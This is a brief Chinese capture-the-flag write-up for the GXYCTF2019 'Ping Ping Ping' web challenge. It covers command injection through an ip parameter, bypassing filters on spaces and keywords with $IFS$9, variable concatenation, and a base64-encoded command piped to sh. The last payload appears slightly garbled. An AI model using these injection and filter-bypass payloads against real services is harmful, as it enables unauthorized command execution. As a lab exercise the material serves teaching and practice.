GXYCTF2019-WEB-Ping Ping Ping
2020-04-08 本文已影响0人
le3f
复现地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping
考察点:命令执行 空白字符绕过
输入|ls 显示flag.php

过滤了空格

过滤了某些符号

对flag字符进行了过滤

读取到index.php源文件

进行字符串拼接,读取到flag
/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php
源码中对bash进行过滤,可以用sh
/?ip=127.0.0.1;echo1Y2F0IGZsYWcucGhw|base64
1-d|sh